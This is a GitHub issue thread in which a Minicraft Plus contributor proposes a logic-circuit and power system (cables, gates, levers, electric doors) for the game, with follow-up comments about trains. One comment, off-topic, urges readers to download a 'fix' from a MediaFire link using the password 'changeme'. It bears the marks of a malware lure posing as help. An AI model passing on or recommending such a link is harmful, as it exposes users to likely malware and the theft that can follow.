### ISSUE TITLE
Logic circuits/control circuit system

### ISSUE THREAD

**Issue by BenCheung0422** [MinicraftPlus/minicraft-plus-revived#694]
**Is your feature request related to a problem? Please describe.**
There were some suggestions about implementing redstone (#557) for more and advanced gameplay contents, at the same time there is not much content in the game. Therefore, an advanced logic circuit system can be implemented instead of copying redstone system from Minecraft if such system can be added into the game.

**Describe the solution you'd like**
In general, the logic circuits may be more complex than the one in Minecraft, but there are a lot of differences.

Components, either generate or consume power and/or signals. Gates, transform signals, generally (appearance) are not fully sized in textures, for gate boxes (advanced gates).  Mobs would be able to walk on cables and bare gates, might be blocked by gate boxes. For materials, perhaps copper can be added, or *refined lapis material*, which regards lapis as technology materials or else lapis would be a part of magic system (like potions, etc., as magic materials).

Cables, might be wrapped like IC2, and rubber can be refined from oak. Cables can be implemented either a cable per tile or cable per connection like Immersive Engineering. If cables can be packed (upgrading like AE cable), multiple signal channels can be transmitted at the same time. For a cable per connection, it can either be straight or following placing paths by player, but following path can be hard to be implemented since many points would have to be saved and accuracy of path can be difficult to calculate, which means it would be implemented like Immersive Engineering. For per-connection one, each side of a (component) tile can have multiple ports for cables. For per-tile one, there can be cable interface (like AE2) for cables having multiple channels so that each port corresponds to one channel and matching port interface can establish successful connections; simplest cable can just have one channel. Cables could go up or down.

For power source, perhaps there can be permanent power output (redstone block?) or some generators like tidal power generator or wind turbine generator. I guess it would become something like factory game if implementing too much, though a sandbox survival game can have many different things.

Power units? I am not sure if it is good to have multiple signals on one cable but such kind of system perhaps can be interesting to be implemented. Maybe there would be LP, Lapis Flux or something (definitely not something from RF).

This is like, basic features and components can be implemented in game but more advanced machines can be implemented by mods.

### Components

Power cable
- only transits power
- can only connect to power inputs and outputs

Logic cable
- transmits both signals and power
- can connect to both power and signal inputs and outputs

Circuit wrench
- configuring inputs and outputs of gates, NSEW
- may also changing ports of connections for multi ports

Lever
- can change signal from 0 to 1, and vice versa
- only output signal when powered logic cable is connected
- decision: only one I/O OR only when both 2 ports connected (passing through)

Invert gate (X gate)
- power is required to operate
- one in one out
- a dot is lighted when powered
- when signal is 0, 1 is output
- when signal is 1, 0 is output

And gate
- power is required to operate
- two in one out

Or gate
- power is required to operate
- two in one out

Power output gate
- power is required to operate
- one logic in; one power in; one power out
- when signal is 0, gate is off
- when signal is 1, gate is on
- power circuit is closed when the gate is on

Electric door (or installing motor on doors)
- opened when powered
- closed when not powered
- cannot be operated barely manually

Comparator
- uncertain

Relay
- Usable when implemented like Immersive Engineering

Button
- emitting signal pulse

Pressure plate
- emitting signal when "pressed"

Permanent signal output
- always output 1
- simple component

Capacitor? Transformer? Breaker? Though perhaps this is too much.

Fun fact: Minecraft implemented crafter which only appeared in mods before.

Feel free to provide opinions. Maybe it depends on how the game would grow, either gameplay properties and complexity of the game.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BenCheung0422** [comment]
I just noticed that there was a suggestion about "auto transport system", which can be implemented by powered trains, from #287. I am not sure how this could be implemented, but perhaps detector, powered rail or something could be implemented, or even electric locomotive and steam locomotive.

**Comment by JamesTDG** [comment]
> I just noticed that there was a suggestion about "auto transport system", which can be implemented by powered trains, from #287. I am not sure how this could be implemented, but perhaps detector, powered rail or something could be implemented, or even electric locomotive and steam locomotive.

I would recommend adding 2 versions, combustion for mid-game, and electric (powered via rails) for late-to-end game. NGL it would be funny to integrate elements from factorio into Minicraft

**Comment by BenCheung0422** [comment]
That is an interesting idea. Actually it may depend on how the technology system is done and planned. The stages or tree for electric devices may differ.

**Comment by Makkkkus** [comment]
Duplicate of #557.
